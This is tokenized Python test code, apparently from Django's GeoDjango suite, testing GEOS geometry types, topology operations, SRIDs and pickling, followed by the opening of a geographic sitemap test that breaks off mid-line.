) <EOL> self . assertEqual ( mp . centroid , mpnt . centroid . tuple ) <EOL> self . assertEqual ( mp . coords , tuple ( m . tuple for m in mpnt ) ) <EOL> for p in mpnt : <EOL> self . assertEqual ( p . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( p . geom_typeid , <NUM_LIT:0> ) <EOL> self . assertEqual ( p . empty , False ) <EOL> self . assertEqual ( p . valid , True ) <EOL> def test03a_linestring ( self ) : <EOL> "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for l in self . geometries . linestrings : <EOL> ls = fromstr ( l . wkt ) <EOL> self . assertEqual ( ls . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ls . geom_typeid , <NUM_LIT:1> ) <EOL> self . assertEqual ( ls . empty , False ) <EOL> self . assertEqual ( ls . ring , False ) <EOL> if hasattr ( l , '<STR_LIT>' ) : <EOL> self . assertEqual ( l . centroid , ls . centroid . tuple ) <EOL> if hasattr ( l , '<STR_LIT>' ) : <EOL> self . assertEqual ( l . tup , ls . tuple ) <EOL> self . assertEqual ( True , ls == fromstr ( l . wkt ) ) <EOL> self . assertEqual ( False , ls == prev ) <EOL> self . assertRaises ( GEOSIndexError , ls . __getitem__ , len ( ls ) ) <EOL> prev = ls <EOL> self . assertEqual ( ls , LineString ( ls . tuple ) ) <EOL> self . assertEqual ( ls , LineString ( * ls . tuple ) ) <EOL> self . assertEqual ( ls , LineString ( [ list ( tup ) for tup in ls . tuple ] ) ) <EOL> self . assertEqual ( ls . wkt , LineString ( * tuple ( Point ( tup ) for tup in ls . tuple ) ) . wkt ) <EOL> if numpy : self . assertEqual ( ls , LineString ( numpy . array ( ls . tuple ) ) ) <EOL> def test03b_multilinestring ( self ) : <EOL> "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for l in self . geometries . multilinestrings : <EOL> ml = fromstr ( l . wkt ) <EOL> self . assertEqual ( ml . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ml . geom_typeid , <NUM_LIT:5> ) <EOL> self . assertAlmostEqual ( l . centroid [ <NUM_LIT:0> ] , ml . centroid . x , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( l . centroid [ <NUM_LIT:1> ] , ml . centroid . y , <NUM_LIT:9> ) <EOL> self . assertEqual ( True , ml == fromstr ( l . wkt ) ) <EOL> self . assertEqual ( False , ml == prev ) <EOL> prev = ml <EOL> for ls in ml : <EOL> self . assertEqual ( ls . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ls . geom_typeid , <NUM_LIT:1> ) <EOL> self . assertEqual ( ls . empty , False ) <EOL> self . assertRaises ( GEOSIndexError , ml . __getitem__ , len ( ml ) ) <EOL> self . assertEqual ( ml . wkt , MultiLineString ( * tuple ( s . clone ( ) for s in ml ) ) . wkt ) <EOL> self . assertEqual ( ml , MultiLineString ( * tuple ( LineString ( s . tuple ) for s in ml ) ) ) <EOL> def test04_linearring ( self ) : <EOL> "<STR_LIT>" <EOL> for rr in self . geometries . linearrings : <EOL> lr = fromstr ( rr . wkt ) <EOL> self . assertEqual ( lr . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( lr . geom_typeid , <NUM_LIT:2> ) <EOL> self . assertEqual ( rr . n_p , len ( lr ) ) <EOL> self . assertEqual ( True , lr . valid ) <EOL> self . assertEqual ( False , lr . empty ) <EOL> self . assertEqual ( lr , LinearRing ( lr . tuple ) ) <EOL> self . assertEqual ( lr , LinearRing ( * lr . tuple ) ) <EOL> self . assertEqual ( lr , LinearRing ( [ list ( tup ) for tup in lr . tuple ] ) ) <EOL> if numpy : self . assertEqual ( lr , LinearRing ( numpy . array ( lr . tuple ) ) ) <EOL> def test05a_polygons ( self ) : <EOL> "<STR_LIT>" <EOL> bbox = ( - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> p = Polygon . from_bbox ( bbox ) <EOL> self . assertEqual ( bbox , p . extent ) <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for p in self . geometries . polygons : <EOL> poly = fromstr ( p . wkt ) <EOL> self . assertEqual ( poly . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( poly . geom_typeid , <NUM_LIT:3> ) <EOL> self . assertEqual ( poly . empty , False ) <EOL> self . assertEqual ( poly . ring , False ) <EOL> self . assertEqual ( p . n_i , poly . num_interior_rings ) <EOL> self . assertEqual ( p . n_i + <NUM_LIT:1> , len ( poly ) ) <EOL> self . assertEqual ( p . n_p , poly . num_points ) <EOL> self . assertAlmostEqual ( p . area , poly . area , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( p . centroid [ <NUM_LIT:0> ] , poly . centroid . tuple [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( p . centroid [ <NUM_LIT:1> ] , poly . centroid . tuple [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> self . assertEqual ( True , poly == fromstr ( p . wkt ) ) <EOL> self . assertEqual ( False , poly == prev ) <EOL> self . assertEqual ( True , poly != prev ) <EOL> ring = poly . exterior_ring <EOL> self . assertEqual ( ring . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ring . geom_typeid , <NUM_LIT:2> ) <EOL> if p . ext_ring_cs : <EOL> self . assertEqual ( p . ext_ring_cs , ring . tuple ) <EOL> self . assertEqual ( p . ext_ring_cs , poly [ <NUM_LIT:0> ] . tuple ) <EOL> self . assertRaises ( GEOSIndexError , poly . __getitem__ , len ( poly ) ) <EOL> self . assertRaises ( GEOSIndexError , poly . __setitem__ , len ( poly ) , False ) <EOL> self . assertRaises ( GEOSIndexError , poly . __getitem__ , - <NUM_LIT:1> * len ( poly ) - <NUM_LIT:1> ) <EOL> for r in poly : <EOL> self . assertEqual ( r . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( r . geom_typeid , <NUM_LIT:2> ) <EOL> self . assertRaises ( TypeError , Polygon . __init__ , <NUM_LIT:0> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> self . assertRaises ( TypeError , Polygon . __init__ , '<STR_LIT:foo>' ) <EOL> rings = tuple ( r for r in poly ) <EOL> self . assertEqual ( poly , Polygon ( rings [ <NUM_LIT:0> ] , rings [ <NUM_LIT:1> : ] ) ) <EOL> ring_tuples = tuple ( r . tuple for r in poly ) <EOL> self . assertEqual ( poly , Polygon ( * ring_tuples ) ) <EOL> self . assertEqual ( poly . wkt , Polygon ( * tuple ( r for r in poly ) ) . wkt ) <EOL> self . assertEqual ( poly . wkt , Polygon ( * tuple ( LinearRing ( r . tuple ) for r in poly ) ) . wkt ) <EOL> def test05b_multipolygons ( self ) : <EOL> "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for mp in self . geometries . multipolygons : <EOL> mpoly = fromstr ( mp . wkt ) <EOL> self . assertEqual ( mpoly . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( mpoly . geom_typeid , <NUM_LIT:6> ) <EOL> self . assertEqual ( mp . valid , mpoly . valid ) <EOL> if mp . valid : <EOL> self . assertEqual ( mp . num_geom , mpoly . num_geom ) <EOL> self . assertEqual ( mp . n_p , mpoly . num_coords ) <EOL> self . assertEqual ( mp . num_geom , len ( mpoly ) ) <EOL> self . assertRaises ( GEOSIndexError , mpoly . __getitem__ , len ( mpoly ) ) <EOL> for p in mpoly : <EOL> self . assertEqual ( p . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( p . geom_typeid , <NUM_LIT:3> ) <EOL> self . assertEqual ( p . valid , True ) <EOL> self . assertEqual ( mpoly . wkt , MultiPolygon ( * tuple ( poly . clone ( ) for poly in mpoly ) ) . wkt ) <EOL> print "<STR_LIT>" <EOL> def test06a_memory_hijinks ( self ) : <EOL> "<STR_LIT>" <EOL> poly = fromstr ( self . geometries . polygons [ <NUM_LIT:1> ] . wkt ) <EOL> ring1 = poly [ <NUM_LIT:0> ] <EOL> ring2 = poly [ <NUM_LIT:1> ] <EOL> del ring1 <EOL> del ring2 <EOL> ring1 = poly [ <NUM_LIT:0> ] <EOL> ring2 = poly [ <NUM_LIT:1> ] <EOL> del poly <EOL> s1 , s2 = str ( ring1 ) , str ( ring2 ) <EOL> def test08_coord_seq ( self ) : <EOL> "<STR_LIT>" <EOL> for p in self . geometries . polygons : <EOL> if p . ext_ring_cs : <EOL> poly = fromstr ( p . wkt ) <EOL> cs = poly . exterior_ring . coord_seq <EOL> self . assertEqual ( p . ext_ring_cs , cs . tuple ) <EOL> self . assertEqual ( len ( p . ext_ring_cs ) , len ( cs ) ) <EOL> for i in xrange ( len ( p . ext_ring_cs ) ) : <EOL> c1 = p . ext_ring_cs [ i ] <EOL> c2 = cs [ i ] <EOL> self . assertEqual ( c1 , c2 ) <EOL> if len ( c1 ) == <NUM_LIT:2> : tset = ( <NUM_LIT:5> , <NUM_LIT> ) <EOL> else : tset = ( <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:8> ) <EOL> cs [ i ] = tset <EOL> for j in range ( len ( tset ) ) : <EOL> cs [ i ] = tset <EOL> self . assertEqual ( tset [ j ] , cs [ i ] [ j ] ) <EOL> def test09_relate_pattern ( self ) : <EOL> "<STR_LIT>" <EOL> g = fromstr ( '<STR_LIT>' ) <EOL> self . assertRaises ( GEOSException , g . relate_pattern , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> for rg in self . geometries . relate_geoms : <EOL> a = fromstr ( rg . wkt_a ) <EOL> b = fromstr ( rg . wkt_b ) <EOL> self . assertEqual ( rg . result , a . relate_pattern ( b , rg . pattern ) ) <EOL> self . assertEqual ( rg . pattern , a . relate ( b ) ) <EOL> def test10_intersection ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> i1 = fromstr ( self . geometries . intersect_geoms [ i ] . wkt ) <EOL> self . assertEqual ( True , a . intersects ( b ) ) <EOL> i2 = a . intersection ( b ) <EOL> self . assertEqual ( i1 , i2 ) <EOL> self . assertEqual ( i1 , a & b ) <EOL> a &= b <EOL> self . assertEqual ( i1 , a ) <EOL> def test11_union ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> u1 = fromstr ( self . geometries . union_geoms [ i ] . wkt ) <EOL> u2 = a . union ( b ) <EOL> self . assertEqual ( u1 , u2 ) <EOL> self . assertEqual ( u1 , a | b ) <EOL> a |= b <EOL> self . assertEqual ( u1 , a ) <EOL> def test12_difference ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> d1 = fromstr ( self . geometries . diff_geoms [ i ] . wkt ) <EOL> d2 = a . difference ( b ) <EOL> self . assertEqual ( d1 , d2 ) <EOL> self . assertEqual ( d1 , a - b ) <EOL> a -= b <EOL> self . assertEqual ( d1 , a ) <EOL> def test13_symdifference ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> d1 = fromstr ( self . geometries . sdiff_geoms [ i ] . wkt ) <EOL> d2 = a . sym_difference ( b ) <EOL> self . assertEqual ( d1 , d2 ) <EOL> self . assertEqual ( d1 , a ^ b ) <EOL> a ^= b <EOL> self . assertEqual ( d1 , a ) <EOL> def test14_buffer ( self ) : <EOL> "<STR_LIT>" <EOL> for bg in self . geometries . buffer_geoms : <EOL> g = fromstr ( bg . wkt ) <EOL> exp_buf = fromstr ( bg . buffer_wkt ) <EOL> quadsegs = bg . quadsegs <EOL> width = bg . width <EOL> self . assertRaises ( ctypes . ArgumentError , g . buffer , width , float ( quadsegs ) ) <EOL> buf = g . buffer ( width , quadsegs ) <EOL> self . assertEqual ( exp_buf . num_coords , buf . num_coords ) <EOL> self . assertEqual ( len ( exp_buf ) , len ( buf ) ) <EOL> for j in xrange ( len ( exp_buf ) ) : <EOL> exp_ring = exp_buf [ j ] <EOL> buf_ring = buf [ j ] <EOL> self . assertEqual ( len ( exp_ring ) , len ( buf_ring ) ) <EOL> for k in xrange ( len ( exp_ring ) ) : <EOL> self . assertAlmostEqual ( exp_ring [ k ] [ <NUM_LIT:0> ] , buf_ring [ k ] [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( exp_ring [ k ] [ <NUM_LIT:1> ] , buf_ring [ k ] [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> def test15_srid ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:5> , <NUM_LIT> , srid = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , pnt . srid ) <EOL> pnt . srid = <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , pnt . srid ) <EOL> self . assertRaises ( ctypes . ArgumentError , pnt . set_srid , '<STR_LIT>' ) <EOL> poly = fromstr ( self . geometries . polygons [ <NUM_LIT:1> ] . wkt , srid = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , poly . srid ) <EOL> for ring in poly : self . assertEqual ( <NUM_LIT> , ring . srid ) <EOL> poly . srid = <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , poly . shell . srid ) <EOL> gc = GeometryCollection ( Point ( <NUM_LIT:5> , <NUM_LIT> ) , LineString ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) , srid = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , gc . srid ) <EOL> for i in range ( len ( gc ) ) : self . assertEqual ( <NUM_LIT> , gc [ i ] . srid ) <EOL> hex = '<STR_LIT>' <EOL> p1 = fromstr ( hex ) <EOL> self . assertEqual ( <NUM_LIT> , p1 . srid ) <EOL> exp_srid = self . null_srid <EOL> p2 = fromstr ( p1 . hex ) <EOL> self . assertEqual ( exp_srid , p2 . srid ) <EOL> p3 = fromstr ( p1 . hex , srid = - <NUM_LIT:1> ) <EOL> self . assertEqual ( - <NUM_LIT:1> , p3 . srid ) <EOL> def test16_mutable_geometries ( self ) : <EOL> "<STR_LIT>" <EOL> for p in self . geometries . polygons : <EOL> poly = fromstr ( p . wkt ) <EOL> self . assertRaises ( TypeError , poly . __setitem__ , <NUM_LIT:0> , LineString ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ) ) <EOL> shell_tup = poly . shell . tuple <EOL> new_coords = [ ] <EOL> for point in shell_tup : new_coords . append ( ( point [ <NUM_LIT:0> ] + <NUM_LIT> , point [ <NUM_LIT:1> ] + <NUM_LIT> ) ) <EOL> new_shell = LinearRing ( * tuple ( new_coords ) ) <EOL> poly . exterior_ring = new_shell <EOL> s = str ( new_shell ) <EOL> self . assertEqual ( poly . exterior_ring , new_shell ) <EOL> self . assertEqual ( poly [ <NUM_LIT:0> ] , new_shell ) <EOL> for tg in self . geometries . multipoints : <EOL> mp = fromstr ( tg . wkt ) <EOL> for i in range ( len ( mp ) ) : <EOL> pnt = mp [ i ] <EOL> new = Point ( random . randint ( <NUM_LIT:1> , <NUM_LIT:100> ) , random . randint ( <NUM_LIT:1> , <NUM_LIT:100> ) ) <EOL> mp [ i ] = new <EOL> s = str ( new ) <EOL> self . assertEqual ( mp [ i ] , new ) <EOL> self . assertEqual ( mp [ i ] . wkt , new . wkt ) <EOL> self . assertNotEqual ( pnt , mp [ i ] ) <EOL> for tg in self . geometries . multipolygons : <EOL> mpoly = fromstr ( tg . wkt ) <EOL> for i in xrange ( len ( mpoly ) ) : <EOL> poly = mpoly [ i ] <EOL> old_poly = mpoly [ i ] <EOL> for j in xrange ( len ( poly ) ) : <EOL> r = poly [ j ] <EOL> for k in xrange ( len ( r ) ) : r [ k ] = ( r [ k ] [ <NUM_LIT:0> ] + <NUM_LIT> , r [ k ] [ <NUM_LIT:1> ] + <NUM_LIT> ) <EOL> poly [ j ] = r <EOL> self . assertNotEqual ( mpoly [ i ] , poly ) <EOL> mpoly [ i ] = poly <EOL> s = str ( poly ) <EOL> self . assertEqual ( mpoly [ i ] , poly ) <EOL> self . assertNotEqual ( mpoly [ i ] , old_poly ) <EOL> def test17_threed ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:8> ) <EOL> self . assertEqual ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , pnt . coords ) <EOL> self . assertRaises ( TypeError , pnt . set_coords , ( <NUM_LIT:1.> , <NUM_LIT> ) ) <EOL> pnt . coords = ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) , pnt . coords ) <EOL> ls = LineString ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ) ) <EOL> self . assertEqual ( ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ) ) , ls . tuple ) <EOL> self . assertRaises ( TypeError , ls . __setitem__ , <NUM_LIT:0> , ( <NUM_LIT:1.> , <NUM_LIT> ) ) <EOL> ls [ <NUM_LIT:0> ] = ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) , ls [ <NUM_LIT:0> ] ) <EOL> def test18_distance ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . assertEqual ( <NUM_LIT:0.0> , pnt . distance ( Point ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> self . assertEqual ( <NUM_LIT:1.0> , pnt . distance ( Point ( <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertAlmostEqual ( <NUM_LIT> , pnt . distance ( Point ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <NUM_LIT:11> ) <EOL> ls1 = LineString ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> ls2 = LineString ( ( <NUM_LIT:5> , <NUM_LIT:2> ) , ( <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:7> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , ls1 . distance ( ls2 ) ) <EOL> def test19_length ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . assertEqual ( <NUM_LIT:0.0> , pnt . length ) <EOL> ls = LineString ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . assertAlmostEqual ( <NUM_LIT> , ls . length , <NUM_LIT:11> ) <EOL> poly = Polygon ( LinearRing ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> self . assertEqual ( <NUM_LIT> , poly . length ) <EOL> mpoly = MultiPolygon ( poly . clone ( ) , poly ) <EOL> self . assertEqual ( <NUM_LIT> , mpoly . length ) <EOL> def test20a_emptyCollections ( self ) : <EOL> "<STR_LIT>" <EOL> gc1 = GeometryCollection ( [ ] ) <EOL> gc2 = fromstr ( '<STR_LIT>' ) <EOL> pnt = fromstr ( '<STR_LIT>' ) <EOL> ls = fromstr ( '<STR_LIT>' ) <EOL> poly = fromstr ( '<STR_LIT>' ) <EOL> mls = fromstr ( '<STR_LIT>' ) <EOL> mpoly1 = fromstr ( '<STR_LIT>' ) <EOL> mpoly2 = MultiPolygon ( ( ) ) <EOL> for g in [ gc1 , gc2 , pnt , ls , poly , mls , mpoly1 , mpoly2 ] : <EOL> self . assertEqual ( True , g . empty ) <EOL> if isinstance ( g , Polygon ) : <EOL> self . assertEqual ( <NUM_LIT:1> , len ( g ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , g . num_geom ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( g [ <NUM_LIT:0> ] ) ) <EOL> elif isinstance ( g , ( Point , LineString ) ) : <EOL> self . assertEqual ( <NUM_LIT:1> , g . num_geom ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( g ) ) <EOL> else : <EOL> self . assertEqual ( <NUM_LIT:0> , g . num_geom ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( g ) ) <EOL> if isinstance ( g , Point ) : <EOL> self . assertRaises ( GEOSIndexError , g . get_x ) <EOL> elif isinstance ( g , Polygon ) : <EOL> lr = g . shell <EOL> self . assertEqual ( '<STR_LIT>' , lr . wkt ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( lr ) ) <EOL> self . assertEqual ( True , lr . empty ) <EOL> self . assertRaises ( GEOSIndexError , lr . __getitem__ , <NUM_LIT:0> ) <EOL> else : <EOL> self . assertRaises ( GEOSIndexError , g . __getitem__ , <NUM_LIT:0> ) <EOL> def test20b_collections_of_collections ( self ) : <EOL> "<STR_LIT>" <EOL> coll = [ mp . wkt for mp in self . geometries . multipolygons if mp . valid ] <EOL> coll . extend ( [ mls . wkt for mls in self . geometries . multilinestrings ] ) <EOL> coll . extend ( [ p . wkt for p in self . geometries . polygons ] ) <EOL> coll . extend ( [ mp . wkt for mp in self . geometries . multipoints ] ) <EOL> gc_wkt = '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( coll ) <EOL> gc1 = GEOSGeometry ( gc_wkt ) <EOL> gc2 = GeometryCollection ( * tuple ( g for g in gc1 ) ) <EOL> self . assertEqual ( gc1 , gc2 ) <EOL> def test21_test_gdal ( self ) : <EOL> "<STR_LIT>" <EOL> if not gdal . HAS_GDAL : return <EOL> g1 = fromstr ( '<STR_LIT>' ) <EOL> self . assertEqual ( True , isinstance ( g1 . ogr , gdal . OGRGeometry ) ) <EOL> self . assertEqual ( g1 . srs , None ) <EOL> g2 = fromstr ( '<STR_LIT>' , srid = <NUM_LIT> ) <EOL> self . assertEqual ( True , isinstance ( g2 . ogr , gdal . OGRGeometry ) ) <EOL> self . assertEqual ( True , isinstance ( g2 . srs , gdal . SpatialReference ) ) <EOL> self . assertEqual ( g2 . hex , g2 . ogr . hex ) <EOL> self . assertEqual ( '<STR_LIT>' , g2 . srs . name ) <EOL> def test22_copy ( self ) : <EOL> "<STR_LIT>" <EOL> import django . utils . copycompat as copy <EOL> poly = GEOSGeometry ( '<STR_LIT>' ) <EOL> cpy1 = copy . copy ( poly ) <EOL> cpy2 = copy . deepcopy ( poly ) <EOL> self . assertNotEqual ( poly . _ptr , cpy1 . _ptr ) <EOL> self . assertNotEqual ( poly . _ptr , cpy2 . _ptr ) <EOL> def test23_transform ( self ) : <EOL> "<STR_LIT>" <EOL> if not gdal . HAS_GDAL : return <EOL> orig = GEOSGeometry ( '<STR_LIT>' , <NUM_LIT> ) <EOL> trans = GEOSGeometry ( '<STR_LIT>' , <NUM_LIT> ) <EOL> t1 , t2 , t3 = orig . clone ( ) , orig . clone ( ) , orig . clone ( ) <EOL> t1 . transform ( trans . srid ) <EOL> t2 . transform ( gdal . SpatialReference ( '<STR_LIT>' ) ) <EOL> ct = gdal . CoordTransform ( gdal . SpatialReference ( '<STR_LIT>' ) , gdal . SpatialReference ( <NUM_LIT> ) ) <EOL> t3 . transform ( ct ) <EOL> k1 = orig . clone ( ) <EOL> k2 = k1 . transform ( trans . srid , clone = True ) <EOL> self . assertEqual ( k1 , orig ) <EOL> self . assertNotEqual ( k1 , k2 ) <EOL> prec = <NUM_LIT:3> <EOL> for p in ( t1 , t2 , t3 , k2 ) : <EOL> self . assertAlmostEqual ( trans . x , p . x , prec ) <EOL> self . assertAlmostEqual ( trans . y , p . y , prec ) <EOL> def test24_extent ( self ) : <EOL> "<STR_LIT>" <EOL> mp = MultiPoint ( Point ( <NUM_LIT:5> , <NUM_LIT> ) , Point ( <NUM_LIT:0> , <NUM_LIT:0> ) , Point ( <NUM_LIT:10> , <NUM_LIT:50> ) ) <EOL> self . assertEqual ( ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , mp . extent ) <EOL> pnt = Point ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , pnt . extent ) <EOL> poly = fromstr ( self . geometries . polygons [ <NUM_LIT:3> ] . wkt ) <EOL> ring = poly . shell <EOL> x , y = ring . x , ring . y <EOL> xmin , ymin = min ( x ) , min ( y ) <EOL> xmax , ymax = max ( x ) , max ( y ) <EOL> self . assertEqual ( ( xmin , ymin , xmax , ymax ) , poly . extent ) <EOL> def test25_pickle ( self ) : <EOL> "<STR_LIT>" <EOL> import pickle , cPickle <EOL> def get_geoms ( lst , srid = None ) : <EOL> return [ GEOSGeometry ( tg . wkt , srid ) for tg in lst ] <EOL> tgeoms = get_geoms ( self . geometries . points ) <EOL> tgeoms . extend ( get_geoms ( self . geometries . multilinestrings , <NUM_LIT> ) ) <EOL> tgeoms . extend ( get_geoms ( self . geometries . polygons , <NUM_LIT> ) ) <EOL> tgeoms . extend ( get_geoms ( self . geometries . multipolygons , <NUM_LIT> ) ) <EOL> no_srid = self . null_srid == - <NUM_LIT:1> <EOL> for geom in tgeoms : <EOL> s1 , s2 = cPickle . dumps ( geom ) , pickle . dumps ( geom ) <EOL> g1 , g2 = cPickle . loads ( s1 ) , pickle . loads ( s2 ) <EOL> for tmpg in ( g1 , g2 ) : <EOL> self . assertEqual ( geom , tmpg ) <EOL> if not no_srid : self . assertEqual ( geom . srid , tmpg . srid ) <EOL> def test26_prepared ( self ) : <EOL> "<STR_LIT>" <EOL> if not GEOS_PREPARE : return <EOL> mpoly = GEOSGeometry ( '<STR_LIT>' ) <EOL> prep = mpoly . prepared <EOL> pnts = [ Point ( <NUM_LIT:5> , <NUM_LIT:5> ) , Point ( <NUM_LIT> , <NUM_LIT> ) , Point ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> covers = [ True , True , False ] <EOL> for pnt , c in zip ( pnts , covers ) : <EOL> self . assertEqual ( mpoly . contains ( pnt ) , prep . contains ( pnt ) ) <EOL> self . assertEqual ( mpoly . intersects ( pnt ) , prep . intersects ( pnt ) ) <EOL> self . assertEqual ( c , prep . covers ( pnt ) ) <EOL> def test26_line_merge ( self ) : <EOL> "<STR_LIT>" <EOL> ref_geoms = ( fromstr ( '<STR_LIT>' ) , <EOL> fromstr ( '<STR_LIT>' ) , <EOL> ) <EOL> ref_merged = ( fromstr ( '<STR_LIT>' ) , <EOL> fromstr ( '<STR_LIT>' ) , <EOL> ) <EOL> for geom , merged in zip ( ref_geoms , ref_merged ) : <EOL> self . assertEqual ( merged , geom . merged ) <EOL> def suite ( ) : <EOL> s = unittest . TestSuite ( ) <EOL> s . addTest ( unittest . makeSuite ( GEOSTest ) ) <EOL> return s <EOL> def run ( verbosity = <NUM_LIT:2> ) : <EOL> unittest . TextTestRunner ( verbosity = verbosity ) . run ( suite ( ) ) </s>
<s> import cStringIO <EOL> from xml . dom import minidom <EOL> import zipfile <EOL> from django . test import TestCase <EOL> from models import City , Country <EOL> class GeoSitemapTest ( TestCase ) : <EOL> urls = '<STR_LIT>' <EOL> def assertChildNodes ( self , elem , expected ) : <EOL> "<STR_LIT>" <EOL> actual = set ( [ n . nodeName for n in elem . childNodes ] ) <EOL> expected = set ( expected ) <EOL> self . assertEqual ( actual , expected ) <EOL> def test_geositemap_index ( self ) : <EOL> "<STR_LIT>" <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' ) . content ) <EOL> index = doc . firstChild <EOL> self . assertEqual ( index . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( index . getElementsByTagName ( '<STR_LIT>' ) ) ) <EOL> def test_geositemap_kml ( self ) : <EOL> "<STR_LIT>" <EOL> for kml_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' % kml_type ) . content ) <EOL> urlset = doc . firstChild <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> urls = urlset . getElementsByTagName ( '<STR_LIT:url>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( urls ) ) <EOL> for url in urls : <EOL> self . assertChildNodes ( url , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> geo_elem = url . getElementsByTagName ( '<STR_LIT>' ) [ 